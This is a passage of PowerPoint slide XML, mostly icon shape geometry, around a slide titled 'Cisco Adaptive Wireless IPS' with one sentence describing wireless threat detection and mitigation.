          <a:xfrm>
            <a:off x="8148648" y="3402876"/>
            <a:ext cx="278816" cy="237665"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 186184 w 64"/>
              <a:gd name="T1" fmla="*/ 144673 h 53"/>
              <a:gd name="T2" fmla="*/ 148258 w 64"/>
              <a:gd name="T3" fmla="*/ 182563 h 53"/>
              <a:gd name="T4" fmla="*/ 37926 w 64"/>
              <a:gd name="T5" fmla="*/ 182563 h 53"/>
              <a:gd name="T6" fmla="*/ 0 w 64"/>
              <a:gd name="T7" fmla="*/ 144673 h 53"/>
              <a:gd name="T8" fmla="*/ 0 w 64"/>
              <a:gd name="T9" fmla="*/ 34446 h 53"/>
              <a:gd name="T10" fmla="*/ 37926 w 64"/>
              <a:gd name="T11" fmla="*/ 0 h 53"/>
              <a:gd name="T12" fmla="*/ 148258 w 64"/>
              <a:gd name="T13" fmla="*/ 0 h 53"/>
              <a:gd name="T14" fmla="*/ 162049 w 64"/>
              <a:gd name="T15" fmla="*/ 0 h 53"/>
              <a:gd name="T16" fmla="*/ 165497 w 64"/>
              <a:gd name="T17" fmla="*/ 3445 h 53"/>
              <a:gd name="T18" fmla="*/ 165497 w 64"/>
              <a:gd name="T19" fmla="*/ 6889 h 53"/>
              <a:gd name="T20" fmla="*/ 158602 w 64"/>
              <a:gd name="T21" fmla="*/ 13778 h 53"/>
              <a:gd name="T22" fmla="*/ 155154 w 64"/>
              <a:gd name="T23" fmla="*/ 17223 h 53"/>
              <a:gd name="T24" fmla="*/ 155154 w 64"/>
              <a:gd name="T25" fmla="*/ 17223 h 53"/>
              <a:gd name="T26" fmla="*/ 148258 w 64"/>
              <a:gd name="T27" fmla="*/ 13778 h 53"/>
              <a:gd name="T28" fmla="*/ 37926 w 64"/>
              <a:gd name="T29" fmla="*/ 13778 h 53"/>
              <a:gd name="T30" fmla="*/ 17239 w 64"/>
              <a:gd name="T31" fmla="*/ 34446 h 53"/>
              <a:gd name="T32" fmla="*/ 17239 w 64"/>
              <a:gd name="T33" fmla="*/ 144673 h 53"/>
              <a:gd name="T34" fmla="*/ 37926 w 64"/>
              <a:gd name="T35" fmla="*/ 165340 h 53"/>
              <a:gd name="T36" fmla="*/ 148258 w 64"/>
              <a:gd name="T37" fmla="*/ 165340 h 53"/>
              <a:gd name="T38" fmla="*/ 168945 w 64"/>
              <a:gd name="T39" fmla="*/ 144673 h 53"/>
              <a:gd name="T40" fmla="*/ 168945 w 64"/>
              <a:gd name="T41" fmla="*/ 110227 h 53"/>
              <a:gd name="T42" fmla="*/ 168945 w 64"/>
              <a:gd name="T43" fmla="*/ 110227 h 53"/>
              <a:gd name="T44" fmla="*/ 179289 w 64"/>
              <a:gd name="T45" fmla="*/ 99893 h 53"/>
              <a:gd name="T46" fmla="*/ 182737 w 64"/>
              <a:gd name="T47" fmla="*/ 99893 h 53"/>
              <a:gd name="T48" fmla="*/ 182737 w 64"/>
              <a:gd name="T49" fmla="*/ 99893 h 53"/>
              <a:gd name="T50" fmla="*/ 186184 w 64"/>
              <a:gd name="T51" fmla="*/ 103338 h 53"/>
              <a:gd name="T52" fmla="*/ 186184 w 64"/>
              <a:gd name="T53" fmla="*/ 144673 h 53"/>
              <a:gd name="T54" fmla="*/ 110332 w 64"/>
              <a:gd name="T55" fmla="*/ 144673 h 53"/>
              <a:gd name="T56" fmla="*/ 93092 w 64"/>
              <a:gd name="T57" fmla="*/ 144673 h 53"/>
              <a:gd name="T58" fmla="*/ 37926 w 64"/>
              <a:gd name="T59" fmla="*/ 89559 h 53"/>
              <a:gd name="T60" fmla="*/ 37926 w 64"/>
              <a:gd name="T61" fmla="*/ 75781 h 53"/>
              <a:gd name="T62" fmla="*/ 51718 w 64"/>
              <a:gd name="T63" fmla="*/ 62003 h 53"/>
              <a:gd name="T64" fmla="*/ 68957 w 64"/>
              <a:gd name="T65" fmla="*/ 62003 h 53"/>
              <a:gd name="T66" fmla="*/ 103436 w 64"/>
              <a:gd name="T67" fmla="*/ 93004 h 53"/>
              <a:gd name="T68" fmla="*/ 186184 w 64"/>
              <a:gd name="T69" fmla="*/ 10334 h 53"/>
              <a:gd name="T70" fmla="*/ 199976 w 64"/>
              <a:gd name="T71" fmla="*/ 10334 h 53"/>
              <a:gd name="T72" fmla="*/ 217215 w 64"/>
              <a:gd name="T73" fmla="*/ 24112 h 53"/>
              <a:gd name="T74" fmla="*/ 217215 w 64"/>
              <a:gd name="T75" fmla="*/ 37890 h 53"/>
              <a:gd name="T76" fmla="*/ 110332 w 64"/>
              <a:gd name="T77" fmla="*/ 144673 h 53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4" h="53">
                <a:moveTo>
                  <a:pt x="54" y="42"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="48"/>
                  <a:pt x="49" y="53"/>
                  <a:pt x="43" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11" y="53"/>
                  <a:pt x="11" y="53"/>
                  <a:pt x="11" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="53"/>
                  <a:pt x="0" y="48"/>
                  <a:pt x="0" y="42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6" y="0"/>
                  <a:pt x="47" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="1"/>
                  <a:pt x="48" y="1"/>
                  <a:pt x="48" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="2"/>
                  <a:pt x="48" y="2"/>
                  <a:pt x="48" y="2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5"/>
                  <a:pt x="45" y="5"/>
                  <a:pt x="45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4" y="4"/>
                  <a:pt x="44" y="4"/>
                  <a:pt x="43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8" y="4"/>
                  <a:pt x="5" y="7"/>
                  <a:pt x="5" y="10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5"/>
                  <a:pt x="8" y="48"/>
                  <a:pt x="11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6" y="48"/>
                  <a:pt x="49" y="45"/>
                  <a:pt x="49" y="42"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="32"/>
                  <a:pt x="49" y="32"/>
                  <a:pt x="49" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="32"/>
                  <a:pt x="49" y="32"/>
                  <a:pt x="49" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="29"/>
                  <a:pt x="52" y="29"/>
                  <a:pt x="52" y="29"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="29"/>
                  <a:pt x="52" y="29"/>
                  <a:pt x="53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54" y="29"/>
                  <a:pt x="54" y="30"/>
                  <a:pt x="54" y="30"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="54" y="42"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="32" y="42"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="31" y="44"/>
                  <a:pt x="29" y="44"/>
                  <a:pt x="27" y="42"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11" y="26"/>
                  <a:pt x="11" y="26"/>
                  <a:pt x="11" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10" y="25"/>
                  <a:pt x="10" y="23"/>
                  <a:pt x="11" y="22"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="18"/>
                  <a:pt x="15" y="18"/>
                  <a:pt x="15" y="18"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="16"/>
                  <a:pt x="18" y="16"/>
                  <a:pt x="20" y="18"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="27"/>
                  <a:pt x="30" y="27"/>
                  <a:pt x="30" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="3"/>
                  <a:pt x="54" y="3"/>
                  <a:pt x="54" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="55" y="2"/>
                  <a:pt x="57" y="2"/>
                  <a:pt x="58" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="7"/>
                  <a:pt x="63" y="7"/>
                  <a:pt x="63" y="7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="8"/>
                  <a:pt x="64" y="10"/>
                  <a:pt x="63" y="11"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32" y="4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33" name="Freeform 108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{022E40AF-103A-4EA6-AEFF-5102D08FC68D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8150399" y="4238366"/>
            <a:ext cx="225895" cy="271509"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 165100 w 48"/>
              <a:gd name="T1" fmla="*/ 106062 h 58"/>
              <a:gd name="T2" fmla="*/ 85990 w 48"/>
              <a:gd name="T3" fmla="*/ 198438 h 58"/>
              <a:gd name="T4" fmla="*/ 82550 w 48"/>
              <a:gd name="T5" fmla="*/ 198438 h 58"/>
              <a:gd name="T6" fmla="*/ 79110 w 48"/>
              <a:gd name="T7" fmla="*/ 198438 h 58"/>
              <a:gd name="T8" fmla="*/ 0 w 48"/>
              <a:gd name="T9" fmla="*/ 106062 h 58"/>
              <a:gd name="T10" fmla="*/ 0 w 48"/>
              <a:gd name="T11" fmla="*/ 6843 h 58"/>
              <a:gd name="T12" fmla="*/ 6879 w 48"/>
              <a:gd name="T13" fmla="*/ 0 h 58"/>
              <a:gd name="T14" fmla="*/ 158221 w 48"/>
              <a:gd name="T15" fmla="*/ 0 h 58"/>
              <a:gd name="T16" fmla="*/ 165100 w 48"/>
              <a:gd name="T17" fmla="*/ 6843 h 58"/>
              <a:gd name="T18" fmla="*/ 165100 w 48"/>
              <a:gd name="T19" fmla="*/ 106062 h 58"/>
              <a:gd name="T20" fmla="*/ 141023 w 48"/>
              <a:gd name="T21" fmla="*/ 23949 h 58"/>
              <a:gd name="T22" fmla="*/ 82550 w 48"/>
              <a:gd name="T23" fmla="*/ 23949 h 58"/>
              <a:gd name="T24" fmla="*/ 82550 w 48"/>
              <a:gd name="T25" fmla="*/ 171067 h 58"/>
              <a:gd name="T26" fmla="*/ 110067 w 48"/>
              <a:gd name="T27" fmla="*/ 153961 h 58"/>
              <a:gd name="T28" fmla="*/ 141023 w 48"/>
              <a:gd name="T29" fmla="*/ 106062 h 58"/>
              <a:gd name="T30" fmla="*/ 141023 w 48"/>
              <a:gd name="T31" fmla="*/ 23949 h 5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8" h="58">
                <a:moveTo>
                  <a:pt x="48" y="31"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="47"/>
                  <a:pt x="26" y="57"/>
                  <a:pt x="25" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="58"/>
                  <a:pt x="24" y="58"/>
                  <a:pt x="24" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="58"/>
                  <a:pt x="23" y="58"/>
                  <a:pt x="23" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="57"/>
                  <a:pt x="0" y="47"/>
                  <a:pt x="0" y="31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47" y="0"/>
                  <a:pt x="48" y="1"/>
                  <a:pt x="48" y="2"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="48" y="31"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="41" y="7"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="7"/>
                  <a:pt x="24" y="7"/>
                  <a:pt x="24" y="7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="50"/>
                  <a:pt x="24" y="50"/>
                  <a:pt x="24" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="49"/>
                  <a:pt x="29" y="47"/>
                  <a:pt x="32" y="45"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="42"/>
                  <a:pt x="41" y="37"/>
                  <a:pt x="41" y="31"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="41" y="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4DBBAE96-FA71-4CEC-A574-AC7D63BFD69D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8140013" y="5059659"/>
            <a:ext cx="282670" cy="273365"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 388863 w 256"/>
              <a:gd name="T1" fmla="*/ 357188 h 224"/>
              <a:gd name="T2" fmla="*/ 19124 w 256"/>
              <a:gd name="T3" fmla="*/ 357188 h 224"/>
              <a:gd name="T4" fmla="*/ 0 w 256"/>
              <a:gd name="T5" fmla="*/ 338053 h 224"/>
              <a:gd name="T6" fmla="*/ 0 w 256"/>
              <a:gd name="T7" fmla="*/ 19135 h 224"/>
              <a:gd name="T8" fmla="*/ 19124 w 256"/>
              <a:gd name="T9" fmla="*/ 0 h 224"/>
              <a:gd name="T10" fmla="*/ 388863 w 256"/>
              <a:gd name="T11" fmla="*/ 0 h 224"/>
              <a:gd name="T12" fmla="*/ 407987 w 256"/>
              <a:gd name="T13" fmla="*/ 19135 h 224"/>
              <a:gd name="T14" fmla="*/ 407987 w 256"/>
              <a:gd name="T15" fmla="*/ 338053 h 224"/>
              <a:gd name="T16" fmla="*/ 388863 w 256"/>
              <a:gd name="T17" fmla="*/ 357188 h 224"/>
              <a:gd name="T18" fmla="*/ 312365 w 256"/>
              <a:gd name="T19" fmla="*/ 338053 h 224"/>
              <a:gd name="T20" fmla="*/ 388863 w 256"/>
              <a:gd name="T21" fmla="*/ 338053 h 224"/>
              <a:gd name="T22" fmla="*/ 388863 w 256"/>
              <a:gd name="T23" fmla="*/ 172216 h 224"/>
              <a:gd name="T24" fmla="*/ 382488 w 256"/>
              <a:gd name="T25" fmla="*/ 172216 h 224"/>
              <a:gd name="T26" fmla="*/ 312365 w 256"/>
              <a:gd name="T27" fmla="*/ 172216 h 224"/>
              <a:gd name="T28" fmla="*/ 312365 w 256"/>
              <a:gd name="T29" fmla="*/ 338053 h 224"/>
              <a:gd name="T30" fmla="*/ 114746 w 256"/>
              <a:gd name="T31" fmla="*/ 338053 h 224"/>
              <a:gd name="T32" fmla="*/ 293241 w 256"/>
              <a:gd name="T33" fmla="*/ 338053 h 224"/>
              <a:gd name="T34" fmla="*/ 293241 w 256"/>
              <a:gd name="T35" fmla="*/ 172216 h 224"/>
              <a:gd name="T36" fmla="*/ 114746 w 256"/>
              <a:gd name="T37" fmla="*/ 172216 h 224"/>
              <a:gd name="T38" fmla="*/ 114746 w 256"/>
              <a:gd name="T39" fmla="*/ 338053 h 224"/>
              <a:gd name="T40" fmla="*/ 19124 w 256"/>
              <a:gd name="T41" fmla="*/ 338053 h 224"/>
              <a:gd name="T42" fmla="*/ 95622 w 256"/>
              <a:gd name="T43" fmla="*/ 338053 h 224"/>
              <a:gd name="T44" fmla="*/ 95622 w 256"/>
              <a:gd name="T45" fmla="*/ 172216 h 224"/>
              <a:gd name="T46" fmla="*/ 19124 w 256"/>
              <a:gd name="T47" fmla="*/ 172216 h 224"/>
              <a:gd name="T48" fmla="*/ 19124 w 256"/>
              <a:gd name="T49" fmla="*/ 338053 h 224"/>
              <a:gd name="T50" fmla="*/ 38249 w 256"/>
              <a:gd name="T51" fmla="*/ 19135 h 224"/>
              <a:gd name="T52" fmla="*/ 19124 w 256"/>
              <a:gd name="T53" fmla="*/ 38270 h 224"/>
              <a:gd name="T54" fmla="*/ 38249 w 256"/>
              <a:gd name="T55" fmla="*/ 57405 h 224"/>
              <a:gd name="T56" fmla="*/ 57373 w 256"/>
              <a:gd name="T57" fmla="*/ 38270 h 224"/>
              <a:gd name="T58" fmla="*/ 38249 w 256"/>
              <a:gd name="T59" fmla="*/ 19135 h 224"/>
              <a:gd name="T60" fmla="*/ 95622 w 256"/>
              <a:gd name="T61" fmla="*/ 19135 h 224"/>
              <a:gd name="T62" fmla="*/ 76498 w 256"/>
              <a:gd name="T63" fmla="*/ 38270 h 224"/>
              <a:gd name="T64" fmla="*/ 95622 w 256"/>
              <a:gd name="T65" fmla="*/ 57405 h 224"/>
              <a:gd name="T66" fmla="*/ 114746 w 256"/>
              <a:gd name="T67" fmla="*/ 38270 h 224"/>
              <a:gd name="T68" fmla="*/ 95622 w 256"/>
              <a:gd name="T69" fmla="*/ 19135 h 224"/>
              <a:gd name="T70" fmla="*/ 152995 w 256"/>
              <a:gd name="T71" fmla="*/ 19135 h 224"/>
              <a:gd name="T72" fmla="*/ 133871 w 256"/>
              <a:gd name="T73" fmla="*/ 38270 h 224"/>
              <a:gd name="T74" fmla="*/ 152995 w 256"/>
              <a:gd name="T75" fmla="*/ 57405 h 224"/>
              <a:gd name="T76" fmla="*/ 172120 w 256"/>
              <a:gd name="T77" fmla="*/ 38270 h 224"/>
              <a:gd name="T78" fmla="*/ 152995 w 256"/>
              <a:gd name="T79" fmla="*/ 19135 h 224"/>
              <a:gd name="T80" fmla="*/ 369738 w 256"/>
              <a:gd name="T81" fmla="*/ 76540 h 224"/>
              <a:gd name="T82" fmla="*/ 38249 w 256"/>
              <a:gd name="T83" fmla="*/ 76540 h 224"/>
              <a:gd name="T84" fmla="*/ 19124 w 256"/>
              <a:gd name="T85" fmla="*/ 76540 h 224"/>
              <a:gd name="T86" fmla="*/ 19124 w 256"/>
              <a:gd name="T87" fmla="*/ 153081 h 224"/>
              <a:gd name="T88" fmla="*/ 95622 w 256"/>
              <a:gd name="T89" fmla="*/ 153081 h 224"/>
              <a:gd name="T90" fmla="*/ 114746 w 256"/>
              <a:gd name="T91" fmla="*/ 153081 h 224"/>
              <a:gd name="T92" fmla="*/ 293241 w 256"/>
              <a:gd name="T93" fmla="*/ 153081 h 224"/>
              <a:gd name="T94" fmla="*/ 312365 w 256"/>
              <a:gd name="T95" fmla="*/ 153081 h 224"/>
              <a:gd name="T96" fmla="*/ 382488 w 256"/>
              <a:gd name="T97" fmla="*/ 153081 h 224"/>
              <a:gd name="T98" fmla="*/ 388863 w 256"/>
              <a:gd name="T99" fmla="*/ 153081 h 224"/>
              <a:gd name="T100" fmla="*/ 388863 w 256"/>
              <a:gd name="T101" fmla="*/ 76540 h 224"/>
              <a:gd name="T102" fmla="*/ 369738 w 256"/>
              <a:gd name="T103" fmla="*/ 76540 h 22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196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40" y="108"/>
                  <a:pt x="240" y="108"/>
                  <a:pt x="240" y="108"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="196" y="108"/>
                  <a:pt x="196" y="108"/>
                  <a:pt x="196" y="108"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="196" y="212"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="72" y="212"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="184" y="212"/>
                  <a:pt x="184" y="212"/>
                  <a:pt x="184" y="21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72" y="108"/>
                  <a:pt x="72" y="108"/>
                  <a:pt x="72" y="108"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="72" y="212"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12" y="212"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="212"/>
                  <a:pt x="60" y="212"/>
                  <a:pt x="60" y="212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96" y="96"/>
                  <a:pt x="196" y="96"/>
                  <a:pt x="196" y="96"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="240" y="96"/>
                  <a:pt x="240" y="96"/>
                  <a:pt x="240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35" name="Freeform 167">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8589AADB-1C2B-4411-8E46-0CED2E73854A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8171295" y="5918185"/>
            <a:ext cx="243360" cy="245306"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 198438 w 58"/>
              <a:gd name="T1" fmla="*/ 162089 h 58"/>
              <a:gd name="T2" fmla="*/ 160803 w 58"/>
              <a:gd name="T3" fmla="*/ 200025 h 58"/>
              <a:gd name="T4" fmla="*/ 37635 w 58"/>
              <a:gd name="T5" fmla="*/ 200025 h 58"/>
              <a:gd name="T6" fmla="*/ 0 w 58"/>
              <a:gd name="T7" fmla="*/ 162089 h 58"/>
              <a:gd name="T8" fmla="*/ 0 w 58"/>
              <a:gd name="T9" fmla="*/ 34487 h 58"/>
              <a:gd name="T10" fmla="*/ 37635 w 58"/>
              <a:gd name="T11" fmla="*/ 0 h 58"/>
              <a:gd name="T12" fmla="*/ 160803 w 58"/>
              <a:gd name="T13" fmla="*/ 0 h 58"/>
              <a:gd name="T14" fmla="*/ 198438 w 58"/>
              <a:gd name="T15" fmla="*/ 34487 h 58"/>
              <a:gd name="T16" fmla="*/ 198438 w 58"/>
              <a:gd name="T17" fmla="*/ 162089 h 58"/>
              <a:gd name="T18" fmla="*/ 167646 w 58"/>
              <a:gd name="T19" fmla="*/ 72423 h 58"/>
              <a:gd name="T20" fmla="*/ 167646 w 58"/>
              <a:gd name="T21" fmla="*/ 58628 h 58"/>
              <a:gd name="T22" fmla="*/ 153961 w 58"/>
              <a:gd name="T23" fmla="*/ 44833 h 58"/>
              <a:gd name="T24" fmla="*/ 143696 w 58"/>
              <a:gd name="T25" fmla="*/ 44833 h 58"/>
              <a:gd name="T26" fmla="*/ 82112 w 58"/>
              <a:gd name="T27" fmla="*/ 106910 h 58"/>
              <a:gd name="T28" fmla="*/ 54742 w 58"/>
              <a:gd name="T29" fmla="*/ 79320 h 58"/>
              <a:gd name="T30" fmla="*/ 44477 w 58"/>
              <a:gd name="T31" fmla="*/ 79320 h 58"/>
              <a:gd name="T32" fmla="*/ 30792 w 58"/>
              <a:gd name="T33" fmla="*/ 93115 h 58"/>
              <a:gd name="T34" fmla="*/ 30792 w 58"/>
              <a:gd name="T35" fmla="*/ 103461 h 58"/>
              <a:gd name="T36" fmla="*/ 75270 w 58"/>
              <a:gd name="T37" fmla="*/ 151743 h 58"/>
              <a:gd name="T38" fmla="*/ 88955 w 58"/>
              <a:gd name="T39" fmla="*/ 151743 h 58"/>
              <a:gd name="T40" fmla="*/ 167646 w 58"/>
              <a:gd name="T41" fmla="*/ 72423 h 5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9" y="21"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="20"/>
                  <a:pt x="50" y="18"/>
                  <a:pt x="49" y="17"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="13"/>
                  <a:pt x="45" y="13"/>
                  <a:pt x="45" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="12"/>
                  <a:pt x="43" y="12"/>
                  <a:pt x="42" y="13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2"/>
                  <a:pt x="14" y="22"/>
                  <a:pt x="13" y="23"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="27"/>
                  <a:pt x="9" y="27"/>
                  <a:pt x="9" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8" y="28"/>
                  <a:pt x="8" y="29"/>
                  <a:pt x="9" y="30"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="44"/>
                  <a:pt x="22" y="44"/>
                  <a:pt x="22" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="45"/>
                  <a:pt x="25" y="45"/>
                  <a:pt x="26" y="44"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="49" y="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FD948545-B2C5-466D-B22E-946BEAA506DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119736" y="1170265"/>
            <a:ext cx="2102301" cy="61555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r">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Cisco Adaptive Wireless IPS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103B9366-2A76-456D-B826-577D7803E967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2619374" y="1139489"/>
            <a:ext cx="7770405" cy="67710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>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Adaptive wireless IPS (WIPS) provides wireless-network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>threat detection and mitigation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>against malicious attacks and security vulnerabilities</a:t>
            </a:r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2A0F40AA-95C1-440F-AA1A-4B6572F23585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11014342" y="1201820"/>
            <a:ext cx="553096" cy="552444"/>
            <a:chOff x="9059049" y="1861937"/>
            <a:chExt cx="1306207" cy="1304666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Freeform 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF0242E1-4E32-4512-8415-2A45C864E2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59049" y="1861937"/>
              <a:ext cx="1306207" cy="1304666"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 707 w 717"/>
                <a:gd name="T1" fmla="*/ 298 h 716"/>
                <a:gd name="T2" fmla="*/ 643 w 717"/>
                <a:gd name="T3" fmla="*/ 280 h 716"/>
                <a:gd name="T4" fmla="*/ 677 w 717"/>
                <a:gd name="T5" fmla="*/ 204 h 716"/>
                <a:gd name="T6" fmla="*/ 564 w 717"/>
                <a:gd name="T7" fmla="*/ 146 h 716"/>
                <a:gd name="T8" fmla="*/ 551 w 717"/>
                <a:gd name="T9" fmla="*/ 135 h 716"/>
                <a:gd name="T10" fmla="*/ 482 w 717"/>
                <a:gd name="T11" fmla="*/ 26 h 716"/>
                <a:gd name="T12" fmla="*/ 434 w 717"/>
                <a:gd name="T13" fmla="*/ 73 h 716"/>
                <a:gd name="T14" fmla="*/ 387 w 717"/>
                <a:gd name="T15" fmla="*/ 6 h 716"/>
                <a:gd name="T16" fmla="*/ 280 w 717"/>
                <a:gd name="T17" fmla="*/ 74 h 716"/>
                <a:gd name="T18" fmla="*/ 258 w 717"/>
                <a:gd name="T19" fmla="*/ 81 h 716"/>
                <a:gd name="T20" fmla="*/ 130 w 717"/>
                <a:gd name="T21" fmla="*/ 88 h 716"/>
                <a:gd name="T22" fmla="*/ 147 w 717"/>
                <a:gd name="T23" fmla="*/ 153 h 716"/>
                <a:gd name="T24" fmla="*/ 68 w 717"/>
                <a:gd name="T25" fmla="*/ 156 h 716"/>
                <a:gd name="T26" fmla="*/ 73 w 717"/>
                <a:gd name="T27" fmla="*/ 283 h 716"/>
                <a:gd name="T28" fmla="*/ 69 w 717"/>
                <a:gd name="T29" fmla="*/ 304 h 716"/>
                <a:gd name="T30" fmla="*/ 10 w 717"/>
                <a:gd name="T31" fmla="*/ 418 h 716"/>
                <a:gd name="T32" fmla="*/ 75 w 717"/>
                <a:gd name="T33" fmla="*/ 436 h 716"/>
                <a:gd name="T34" fmla="*/ 41 w 717"/>
                <a:gd name="T35" fmla="*/ 512 h 716"/>
                <a:gd name="T36" fmla="*/ 154 w 717"/>
                <a:gd name="T37" fmla="*/ 570 h 716"/>
                <a:gd name="T38" fmla="*/ 166 w 717"/>
                <a:gd name="T39" fmla="*/ 581 h 716"/>
                <a:gd name="T40" fmla="*/ 236 w 717"/>
                <a:gd name="T41" fmla="*/ 689 h 716"/>
                <a:gd name="T42" fmla="*/ 284 w 717"/>
